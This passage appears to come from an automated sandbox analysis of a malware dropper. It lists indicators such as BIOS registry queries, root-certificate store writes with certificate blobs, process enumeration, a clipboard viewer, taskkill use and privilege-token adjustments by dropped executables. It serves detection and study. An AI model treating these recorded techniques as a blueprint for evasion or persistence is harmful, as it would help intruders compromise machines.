Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	UltraMediaBurner.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Tue11e4e580f2e8141a3.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4468	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	msedge.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\8\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	msedge.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4560	powershell.exe
4560	powershell.exe
5644	WerFault.exe
5644	WerFault.exe
5668	WerFault.exe
5668	WerFault.exe
5652	WerFault.exe
5652	WerFault.exe
4560	powershell.exe
5468	UltraMediaBurner.exe
5468	UltraMediaBurner.exe
1160	WerFault.exe
1160	WerFault.exe
5876	Tue11e4e580f2e8141a3.exe
5876	Tue11e4e580f2e8141a3.exe
2816	WerFault.exe
2816	WerFault.exe
5140	setup_2.tmp
5140	setup_2.tmp
1364	WerFault.exe
1364	WerFault.exe
3236	WerFault.exe
3236	WerFault.exe
568	ultramediaburner.tmp
568	ultramediaburner.tmp
5708	6661818.exe
5708	6661818.exe
4644	6312160.exe
4644	6312160.exe
5944	Chrome 5.exe
5944	Chrome 5.exe
5368	5303111.exe
5368	5303111.exe
724	1779428.exe
724	1779428.exe
5864	4421370.exe
5864	4421370.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe
6036	Daecujyxopa.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5204	WinHoster.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4584	Tue118f55232e4.exe
Token: SeAssignPrimaryTokenPrivilege	4584	Tue118f55232e4.exe
Token: SeLockMemoryPrivilege	4584	Tue118f55232e4.exe
Token: SeIncreaseQuotaPrivilege	4584	Tue118f55232e4.exe
Token: SeMachineAccountPrivilege	4584	Tue118f55232e4.exe
Token: SeTcbPrivilege	4584	Tue118f55232e4.exe
Token: SeSecurityPrivilege	4584	Tue118f55232e4.exe
Token: SeTakeOwnershipPrivilege	4584	Tue118f55232e4.exe
Token: SeLoadDriverPrivilege	4584	Tue118f55232e4.exe
Token: SeSystemProfilePrivilege	4584	Tue118f55232e4.exe
Token: SeSystemtimePrivilege	4584	Tue118f55232e4.exe
Token: SeProfSingleProcessPrivilege	4584	Tue118f55232e4.exe
Token: SeIncBasePriorityPrivilege	4584	Tue118f55232e4.exe
Token: SeCreatePagefilePrivilege	4584	Tue118f55232e4.exe
Token: SeCreatePermanentPrivilege	4584	Tue118f55232e4.exe
Token: SeBackupPrivilege	4584	Tue118f55232e4.exe
Token: SeRestorePrivilege	4584	Tue118f55232e4.exe
Token: SeShutdownPrivilege	4584	Tue118f55232e4.exe
Token: SeDebugPrivilege	4584	Tue118f55232e4.exe
Token: SeAuditPrivilege	4584	Tue118f55232e4.exe
Token: SeSystemEnvironmentPrivilege	4584	Tue118f55232e4.exe
